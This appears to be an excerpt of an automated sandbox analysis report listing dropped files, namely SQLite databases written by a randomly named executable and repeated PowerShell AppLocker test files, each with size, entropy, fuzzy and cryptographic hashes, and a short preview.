                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
